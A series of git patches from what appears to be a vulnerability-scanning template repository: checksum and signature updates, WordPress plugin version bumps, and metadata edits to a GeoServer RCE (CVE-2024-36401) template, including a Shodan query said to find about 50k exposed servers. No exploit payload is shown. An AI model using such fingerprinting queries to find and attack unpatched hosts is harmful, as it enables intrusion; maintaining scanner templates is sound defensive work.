http/cves/2024/CVE-2024-33610.yaml:24618eb8295fd20c2eaafe525e895edb63a1c04c http/cves/2024/CVE-2024-33724.yaml:fc5b67f9b84cdf5d6d592f2238c1fb0ef08592cc http/cves/2024/CVE-2024-3400.yaml:446beaf529f998b8b0c5957b75870f5198c21ff2 http/cves/2024/CVE-2024-34102.yaml:2152d70ae35f98d6968fad641af063bdd7b8f83b -http/cves/2024/CVE-2024-34351.yaml:538c16df5562ee928dbf6ac41aee3bda4ecaf6d5 +http/cves/2024/CVE-2024-34351.yaml:0b871adb6b9e887987000e89999f1de41647ddcb http/cves/2024/CVE-2024-34470.yaml:9e15fe4d83b7f511f9e363252311ce0fca2208d8 http/cves/2024/CVE-2024-3495.yaml:1f4e6d704c91902aa02887883d46718b45f87654 http/cves/2024/CVE-2024-34982.yaml:68453463b4c080e16f4b23e4bcf22565276f0e20 @@ -3508,7 +3508,7 @@ http/cves/2024/CVE-2024-5522.yaml:1aae46b20c03316823691aa8755eb8e35b46533a http/cves/2024/CVE-2024-5947.yaml:1007c228fb459bf995a9b759b10c668e190ab1e6 http/cves/2024/CVE-2024-6028.yaml:5bb353f3acbac441334cb7219e4198515178e991 http/cves/2024/CVE-2024-6188.yaml:dc4f78116668d20ee580f223cdf67a19cd0c6f26 -http/cves/2024/CVE-2024-6289.yaml:299fe09be2509d72d2233eabd1a1103466a83138 +http/cves/2024/CVE-2024-6289.yaml:83d044a4385a60a024a6dee9f02644f4db94a4b7 http/default-logins/3com/3Com-wireless-default-login.yaml:80e8ff28f6fe58cd692d51a649e382978ba730c3 http/default-logins/3com/3com-nj2000-default-login.yaml:3c260ca4c2ee7809221fc4b9330a540795c081ce http/default-logins/3ware-default-login.yaml:c4ee7d8f55d3a9a6e674b4706b87321bbf25cfda @@ -3525,7 +3525,7 @@ http/default-logins/ambari/ambari-default-login.yaml:c7f2072fb639a02e718d877dcc7 http/default-logins/ampjuke-default-login.yaml:80f58e7f436f698938228565a8b02626e5c287ca http/default-logins/apache/airflow-default-login.yaml:f4a72dcfe661dbfb227717d3201877b185af4d7b http/default-logins/apache/apache-apollo-default-login.yaml:c20802affb7034ce37d2508c867a48010bf59ded -http/default-logins/apache/apisix-default-login.yaml:88d0d5d11425c2cadb204d0afb7b26d8df4376fe +http/default-logins/apache/apisix-default-login.yaml:b46d26d2b69aa5e013a6c9617af3a82c5c195f6c http/default-logins/apache/dolphinscheduler-default-login.yaml:1e4031c994ea6c6aa571dad9a5e7ccbf908e2251 http/default-logins/apache/dubbo-admin-default-login.yaml:1e96758e87c9540e0f40a4eaa04518a23f64eb28 http/default-logins/apache/kafka-center-default-login.yaml:19e5b0334aff53ce7251a89f2ee445228f91c0b9 @@ -8887,7 +8887,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:b8d3d41c80b63f06b42a2ee2956eded98bc66765 +templates-checksum.txt:d328ba36b0261d73bb9550abba786ef4147479d7 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 905b914f7c1a0aa4349c7ec08eafd6eec77c3001 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 16 Jul 2024 09:08:33 +0000 Subject: [PATCH 231/247] Auto Template Signing [Tue Jul 16 09:08:33 UTC 2024] :robot: --- http/default-logins/apache/apisix-default-login.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/http/default-logins/apache/apisix-default-login.yaml b/http/default-logins/apache/apisix-default-login.yaml index ddbff161255..ffb39618f40 100644 --- a/http/default-logins/apache/apisix-default-login.yaml +++ b/http/default-logins/apache/apisix-default-login.yaml @@ -54,5 +54,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100ed7246599d057edeb05c9cbb8f8e6e646ecd8f30c16f824b8fcd3fdb7fc0a4700220730ebc8209a21fced7ba192032e7731959b3eb50f22441f85ac5b3ef82e97e48:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100904a6cca0b88acfef25bc3631d6264acc7fc2297ecae777797da759411611594022077788cb7ea9b625030ddeec91ed24ff33121a3abf0f32d5463bed4c430ff5b7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 7d7ab858b2b3b0048f5e07c6f60279c337bf5a17 Mon Sep 17 00:00:00 2001 From: Ryan Borum <37112354+ryanborum@users.noreply.github.com> Date: Tue, 16 Jul 2024 08:04:14 -0400 Subject: [PATCH 232/247] Improved shodan query for CVE-2024-36401.yaml Returns ~50k accurate results compared to ~900 before. Source: https://www.vicarius.io/vsociety/posts/geoserver-rce-cve-2024-36401 --- http/cves/2024/CVE-2024-36401.yaml | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/http/cves/2024/CVE-2024-36401.yaml b/http/cves/2024/CVE-2024-36401.yaml index eb40bc63a5c..0d68613ef46 100644 --- a/http/cves/2024/CVE-2024-36401.yaml +++ b/http/cves/2024/CVE-2024-36401.yaml @@ -2,7 +2,9 @@ id: CVE-2024-36401 info: name: GeoServer RCE in Evaluating Property Name Expressions - author: DhiyaneshDk + author: + - DhiyaneshDk + - GarysMortalEnemy severity: critical description: | In the GeoServer version prior to 2.25.1, 2.24.3 and 2.23.5 of GeoServer, multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users through specially crafted input against a default GeoServer installation due to unsafely evaluating property names as XPath expressions. @@ -18,7 +20,7 @@ info: max-request: 1 vendor: osgeo product: geoserver - shodan-query: http.title:"geoserver" + shodan-query: Server: GeoHttpServer fofa-query: - title="geoserver" - app="geoserver" @@ -65,4 +67,4 @@ http: part: content_type words: - "application/xml" -# digest: 4a0a004730450220735fae2d600334ad0b407f6e2a0905a071226561197d52236f48b8065ee38fa4022100c16a9085e40790dda9b6217e62a1d5fc3d0d68d7443cf10582b55cece0c2e632:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220735fae2d600334ad0b407f6e2a0905a071226561197d52236f48b8065ee38fa4022100c16a9085e40790dda9b6217e62a1d5fc3d0d68d7443cf10582b55cece0c2e632:922c64590222798bb761d5b6d8e72950 From 6b5e3f8a7c2cec96b6253edc9a231e7e1d04aa8e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 16 Jul 2024 17:38:49 +0530 Subject: [PATCH 233/247] minor-update --- http/cves/2024/CVE-2024-36401.yaml | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/http/cves/2024/CVE-2024-36401.yaml b/http/cves/2024/CVE-2024-36401.yaml index 0d68613ef46..fea023de057 100644 --- a/http/cves/2024/CVE-2024-36401.yaml +++ b/http/cves/2024/CVE-2024-36401.yaml @@ -2,9 +2,7 @@ id: CVE-2024-36401 info: name: GeoServer RCE in Evaluating Property Name Expressions - author: - - DhiyaneshDk - - GarysMortalEnemy + author: DhiyaneshDk severity: critical description: | In the GeoServer version prior to 2.25.1, 2.24.3 and 2.23.5 of GeoServer, multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users through specially crafted input against a default GeoServer installation due to unsafely evaluating property names as XPath expressions. From 4651d77e9c233945426e16dd4da7179f4680016d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 16 Jul 2024 17:42:48 +0530 Subject: [PATCH 234/247] fix-lint --- http/cves/2024/CVE-2024-36401.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-36401.yaml b/http/cves/2024/CVE-2024-36401.yaml index fea023de057..eb0361468d5 100644 --- a/http/cves/2024/CVE-2024-36401.yaml +++ b/http/cves/2024/CVE-2024-36401.yaml @@ -18,7 +18,7 @@ info: max-request: 1 vendor: osgeo product: geoserver - shodan-query: Server: GeoHttpServer + shodan-query: "Server: GeoHttpServer" fofa-query: - title="geoserver" - app="geoserver" From 2db502e313c43db7c0c0a558bb7afeedefeda739 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 16 Jul 2024 17:46:41 +0530 Subject: [PATCH 235/247] add author name --- http/cves/2024/CVE-2024-36401.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-36401.yaml b/http/cves/2024/CVE-2024-36401.yaml index eb0361468d5..358bd229f91 100644 --- a/http/cves/2024/CVE-2024-36401.yaml +++ b/http/cves/2024/CVE-2024-36401.yaml @@ -2,7 +2,7 @@ id: CVE-2024-36401 info: name: GeoServer RCE in Evaluating Property Name Expressions - author: DhiyaneshDk + author: DhiyaneshDk,ryanborum severity: critical description: | In the GeoServer version prior to 2.25.1, 2.24.3 and 2.23.5 of GeoServer, multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users through specially crafted input against a default GeoServer installation due to unsafely evaluating property names as XPath expressions. From 95ad84fc00f4a3949041aeb26b72e22a79aaa559 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 16 Jul 2024 12:35:37 +0000 Subject: [PATCH 236/247] Auto Generated New Template Addition List [Tue Jul 16 12:35:37 UTC 2024] :robot: From b11d25de6d3cb991c8062b9098db3e9d36275c40 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 16 Jul 2024 12:35:56 +0000 Subject: [PATCH 237/247] Auto Generated Templates Checksum [Tue Jul 16 12:35:56 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index cf794f8e9d7..d1ccdd58d0f 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3479,7 +3479,7 @@ http/cves/2024/CVE-2024-34470.yaml:9e15fe4d83b7f511f9e363252311ce0fca2208d8 http/cves/2024/CVE-2024-3495.yaml:1f4e6d704c91902aa02887883d46718b45f87654 http/cves/2024/CVE-2024-34982.yaml:68453463b4c080e16f4b23e4bcf22565276f0e20 http/cves/2024/CVE-2024-3552.yaml:0994d94f6f8b7ea5f3774e6b4fbc542a57369f6e -http/cves/2024/CVE-2024-36401.yaml:ee5f88dccf1d4ffbb38cfea089a1a650527451ce +http/cves/2024/CVE-2024-36401.yaml:772f40c37a1b1da253f91f61412f6d74b85d2a70 http/cves/2024/CVE-2024-36412.yaml:3dab338da4cd060aacc90a2c21159bf56c95bdff http/cves/2024/CVE-2024-36527.yaml:eb2651a0ee32128fdfe8ae24c72f5d61a1a7f68e http/cves/2024/CVE-2024-36837.yaml:65450880230a57a47c4dbf8b268af022ab009189 @@ -3525,7 +3525,7 @@ http/default-logins/ambari/ambari-default-login.yaml:c7f2072fb639a02e718d877dcc7 http/default-logins/ampjuke-default-login.yaml:80f58e7f436f698938228565a8b02626e5c287ca http/default-logins/apache/airflow-default-login.yaml:f4a72dcfe661dbfb227717d3201877b185af4d7b http/default-logins/apache/apache-apollo-default-login.yaml:c20802affb7034ce37d2508c867a48010bf59ded -http/default-logins/apache/apisix-default-login.yaml:b46d26d2b69aa5e013a6c9617af3a82c5c195f6c +http/default-logins/apache/apisix-default-login.yaml:923474076782f3ec9cd94c92eba47769c020df70 http/default-logins/apache/dolphinscheduler-default-login.yaml:1e4031c994ea6c6aa571dad9a5e7ccbf908e2251 http/default-logins/apache/dubbo-admin-default-login.yaml:1e96758e87c9540e0f40a4eaa04518a23f64eb28 http/default-logins/apache/kafka-center-default-login.yaml:19e5b0334aff53ce7251a89f2ee445228f91c0b9 @@ -8887,7 +8887,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:d328ba36b0261d73bb9550abba786ef4147479d7 +templates-checksum.txt:536fcf1951bbd1a468afef8485f8c2cd8d3dd2fa wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From d5345f8a7f8128e50185551b62df983e7d081cb8 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 16 Jul 2024 12:37:33 +0000 Subject: [PATCH 238/247] Auto Template Signing [Tue Jul 16 12:37:33 UTC 2024] :robot: --- http/cves/2024/CVE-2024-36401.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-36401.yaml b/http/cves/2024/CVE-2024-36401.yaml index 358bd229f91..6b13ce35820 100644 --- a/http/cves/2024/CVE-2024-36401.yaml +++ b/http/cves/2024/CVE-2024-36401.yaml @@ -65,4 +65,4 @@ http: part: content_type words: - "application/xml" -# digest: 4a0a004730450220735fae2d600334ad0b407f6e2a0905a071226561197d52236f48b8065ee38fa4022100c16a9085e40790dda9b6217e62a1d5fc3d0d68d7443cf10582b55cece0c2e632:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022050a925671a91913f98317b73a4f3cda362d8a355507459097e4288b9a30eb0b8022100ce59a57d605ac794ee5929feec3cb4238e33483384b7735a20fdce903db76366:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 011f1716789864b53d622e763a49e9cabedc2182 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 17 Jul 2024 00:20:32 +0000 Subject: [PATCH 239/247] Auto WordPress Plugins Update [Wed Jul 17 00:20:32 UTC 2024] :robot: --- helpers/wordpress/plugins/admin-menu-editor.txt | 2 +- helpers/wordpress/plugins/astra-sites.txt | 2 +- helpers/wordpress/plugins/custom-fonts.txt | 2 +- .../wordpress/plugins/essential-addons-for-elementor-lite.txt | 2 +- helpers/wordpress/plugins/loco-translate.txt | 2 +- helpers/wordpress/plugins/mailpoet.txt | 2 +- helpers/wordpress/plugins/shortpixel-image-optimiser.txt | 2 +- helpers/wordpress/plugins/tablepress.txt | 2 +- helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt | 2 +- helpers/wordpress/plugins/w3-total-cache.txt | 2 +- .../plugins/woocommerce-pdf-invoices-packing-slips.txt | 2 +- helpers/wordpress/plugins/woocommerce-services.txt | 2 +- helpers/wordpress/plugins/wp-crontrol.txt | 2 +- helpers/wordpress/plugins/wp-statistics.txt | 2 +- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 - http/technologies/wordpress/plugins/add-to-any.yaml | 1 - http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 - http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 - http/technologies/wordpress/plugins/akismet.yaml | 1 - http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 - .../technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 - .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 - http/technologies/wordpress/plugins/amp.yaml | 1 - http/technologies/wordpress/plugins/antispam-bee.yaml | 1 - http/technologies/wordpress/plugins/astra-sites.yaml | 1 - http/technologies/wordpress/plugins/autoptimize.yaml | 1 - http/technologies/wordpress/plugins/backwpup.yaml | 1 - http/technologies/wordpress/plugins/better-search-replace.yaml | 1 - http/technologies/wordpress/plugins/better-wp-security.yaml | 1 - .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 - http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 - http/technologies/wordpress/plugins/breeze.yaml | 1 - http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 - http/technologies/wordpress/plugins/chaty.yaml | 1 - .../wordpress/plugins/child-theme-configurator.yaml | 1 - http/technologies/wordpress/plugins/classic-editor.yaml | 1 - http/technologies/wordpress/plugins/classic-widgets.yaml | 1 - .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 - http/technologies/wordpress/plugins/cmb2.yaml | 1 - http/technologies/wordpress/plugins/coblocks.yaml | 1 - http/technologies/wordpress/plugins/code-snippets.yaml | 1 - http/technologies/wordpress/plugins/coming-soon.yaml | 1 - http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 - .../technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 - http/technologies/wordpress/plugins/contact-form-7.yaml | 1 - http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 - http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 - http/technologies/wordpress/plugins/cookie-notice.yaml | 1 - http/technologies/wordpress/plugins/copy-delete-posts.yaml | 1 - http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 - .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 - http/technologies/wordpress/plugins/custom-css-js.yaml | 1 - http/technologies/wordpress/plugins/custom-fonts.yaml | 1 - http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 - http/technologies/wordpress/plugins/disable-comments.yaml | 1 - http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 - http/technologies/wordpress/plugins/duplicate-page.yaml | 1 - http/technologies/wordpress/plugins/duplicate-post.yaml | 1 - http/technologies/wordpress/plugins/duplicator.yaml | 1 - .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 - http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 - http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 - http/technologies/wordpress/plugins/elementor.yaml | 1 - http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 - http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 - http/technologies/wordpress/plugins/envato-elements.yaml | 1 - .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 - http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 - .../wordpress/plugins/facebook-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 - .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 - http/technologies/wordpress/plugins/flamingo.yaml | 1 - http/technologies/wordpress/plugins/fluentform.yaml | 1 - http/technologies/wordpress/plugins/font-awesome.yaml | 1 - .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/formidable.yaml | 1 - http/technologies/wordpress/plugins/forminator.yaml | 1 - http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 - http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 - .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 - .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 - .../technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 - http/technologies/wordpress/plugins/google-site-kit.yaml | 1 - .../wordpress/plugins/google-sitemap-generator.yaml | 1 - http/technologies/wordpress/plugins/gtranslate.yaml | 1 - http/technologies/wordpress/plugins/gutenberg.yaml | 1 - http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 - .../wordpress/plugins/header-footer-code-manager.yaml | 1 - .../technologies/wordpress/plugins/header-footer-elementor.yaml | 1 - http/technologies/wordpress/plugins/header-footer.yaml | 1 - http/technologies/wordpress/plugins/health-check.yaml | 1 - http/technologies/wordpress/plugins/hello-dolly.yaml | 1 - http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 - http/technologies/wordpress/plugins/hostinger.yaml | 1 - http/technologies/wordpress/plugins/image-optimization.yaml | 1 - http/technologies/wordpress/plugins/imagify.yaml | 1 - http/technologies/wordpress/plugins/imsanity.yaml | 1 - .../wordpress/plugins/insert-headers-and-footers.yaml | 1 - http/technologies/wordpress/plugins/instagram-feed.yaml | 1 - .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 - http/technologies/wordpress/plugins/jetpack.yaml | 1 - http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 - http/technologies/wordpress/plugins/kirki.yaml | 1 - http/technologies/wordpress/plugins/leadin.yaml | 1 - .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 - http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 - http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 - http/technologies/wordpress/plugins/loco-translate.yaml | 1 - http/technologies/wordpress/plugins/loginizer.yaml | 1 - .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 - http/technologies/wordpress/plugins/mailpoet.yaml | 1 - http/technologies/wordpress/plugins/maintenance.yaml | 1 - http/technologies/wordpress/plugins/mainwp-child.yaml | 1 - http/technologies/wordpress/plugins/malcare-security.yaml | 1 - http/technologies/wordpress/plugins/megamenu.yaml | 1 - http/technologies/wordpress/plugins/members.yaml | 1 - http/technologies/wordpress/plugins/meta-box.yaml | 1 - http/technologies/wordpress/plugins/metform.yaml | 1 - http/technologies/wordpress/plugins/ml-slider.yaml | 1 - http/technologies/wordpress/plugins/newsletter.yaml | 1 - .../wordpress/plugins/nextend-facebook-connect.yaml | 1 - http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 - http/technologies/wordpress/plugins/ninja-forms.yaml | 1 - http/technologies/wordpress/plugins/ocean-extra.yaml | 1 - .../technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 - http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 - http/technologies/wordpress/plugins/optinmonster.yaml | 1 - http/technologies/wordpress/plugins/otter-blocks.yaml | 1 - http/technologies/wordpress/plugins/password-protected.yaml | 1 - http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 - .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 - http/technologies/wordpress/plugins/polylang.yaml | 1 - http/technologies/wordpress/plugins/popup-maker.yaml | 1 - http/technologies/wordpress/plugins/post-smtp.yaml | 1 - http/technologies/wordpress/plugins/post-types-order.yaml | 1 - .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 - http/technologies/wordpress/plugins/pretty-link.yaml | 1 - http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 - http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 - http/technologies/wordpress/plugins/redirection.yaml | 1 - http/technologies/wordpress/plugins/redux-framework.yaml | 1 - http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/royal-elementor-addons.yaml | 1 - http/technologies/wordpress/plugins/safe-svg.yaml | 1 - http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 - http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 - http/technologies/wordpress/plugins/sg-security.yaml | 1 - http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 - .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 - .../wordpress/plugins/simple-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/simple-history.yaml | 1 - http/technologies/wordpress/plugins/siteguard.yaml | 1 - http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 - http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 - http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 - .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 1 - .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 - http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 - http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 - http/technologies/wordpress/plugins/tablepress.yaml | 1 - http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 - http/technologies/wordpress/plugins/templately.yaml | 1 - http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 - http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 - .../wordpress/plugins/translatepress-multilingual.yaml | 1 - .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 - .../technologies/wordpress/plugins/under-construction-page.yaml | 1 - http/technologies/wordpress/plugins/updraftplus.yaml | 1 - http/technologies/wordpress/plugins/user-role-editor.yaml | 1 - http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 - .../wordpress/plugins/webp-converter-for-media.yaml | 1 - http/technologies/wordpress/plugins/webp-express.yaml | 1 - .../wordpress/plugins/widget-importer-exporter.yaml | 1 - .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 - .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 - http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 - .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 - .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 - .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 - .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 - http/technologies/wordpress/plugins/woocommerce.yaml | 1 - http/technologies/wordpress/plugins/wordfence.yaml | 1 - http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 - http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 - http/technologies/wordpress/plugins/worker.yaml | 1 - http/technologies/wordpress/plugins/wp-crontrol.yaml | 1 - http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 - http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 - http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 - http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 - http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 - http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 - http/technologies/wordpress/plugins/wp-optimize.yaml | 1 - http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 - http/technologies/wordpress/plugins/wp-reset.yaml | 1 - .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 - http/technologies/wordpress/plugins/wp-rollback.yaml | 1 - http/technologies/wordpress/plugins/wp-seopress.yaml | 1 - http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 - http/technologies/wordpress/plugins/wp-smushit.yaml | 1 - http/technologies/wordpress/plugins/wp-statistics.yaml | 1 - http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 - http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 - http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 - http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 - .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 - 214 files changed, 14 insertions(+), 214 deletions(-) diff --git a/helpers/wordpress/plugins/admin-menu-editor.txt b/helpers/wordpress/plugins/admin-menu-editor.txt index c56eaaaf456..44fdbc3aa3b 100644 --- a/helpers/wordpress/plugins/admin-menu-editor.txt +++ b/helpers/wordpress/plugins/admin-menu-editor.txt @@ -1 +1 @@ -1.12.3 \ No newline at end of file +1.12.4 \ No newline at end of file diff --git a/helpers/wordpress/plugins/astra-sites.txt b/helpers/wordpress/plugins/astra-sites.txt index 4b8dea47bb9..738a7f03f6a 100644 --- a/helpers/wordpress/plugins/astra-sites.txt +++ b/helpers/wordpress/plugins/astra-sites.txt @@ -1 +1 @@ -4.3.7 \ No newline at end of file +4.3.8 \ No newline at end of file diff --git a/helpers/wordpress/plugins/custom-fonts.txt b/helpers/wordpress/plugins/custom-fonts.txt index c5864dcf3e1..b6da51221fd 100644 --- a/helpers/wordpress/plugins/custom-fonts.txt +++ b/helpers/wordpress/plugins/custom-fonts.txt @@ -1 +1 @@ -2.1.5 \ No newline at end of file +2.1.6 \ No newline at end of file diff --git a/helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt b/helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt index efafb311dfb..550d6e51d83 100644 --- a/helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt +++ b/helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt @@ -1 +1 @@ -5.9.26 \ No newline at end of file +5.9.27 \ No newline at end of file diff --git a/helpers/wordpress/plugins/loco-translate.txt b/helpers/wordpress/plugins/loco-translate.txt index 2b4a67131f0..55609e9eee6 100644 --- a/helpers/wordpress/plugins/loco-translate.txt +++ b/helpers/wordpress/plugins/loco-translate.txt @@ -1 +1 @@ -2.6.10 \ No newline at end of file +2.6.11 \ No newline at end of file diff --git a/helpers/wordpress/plugins/mailpoet.txt b/helpers/wordpress/plugins/mailpoet.txt index 983b22c65d2..cc90415fe26 100644 --- a/helpers/wordpress/plugins/mailpoet.txt +++ b/helpers/wordpress/plugins/mailpoet.txt @@ -1 +1 @@ -4.55.0 \ No newline at end of file +4.56.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/shortpixel-image-optimiser.txt b/helpers/wordpress/plugins/shortpixel-image-optimiser.txt index 475e1842948..25c1b355a16 100644 --- a/helpers/wordpress/plugins/shortpixel-image-optimiser.txt +++ b/helpers/wordpress/plugins/shortpixel-image-optimiser.txt @@ -1 +1 @@ -5.6.2 \ No newline at end of file +5.6.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/tablepress.txt b/helpers/wordpress/plugins/tablepress.txt index e7034819f6f..7208c218290 100644 --- 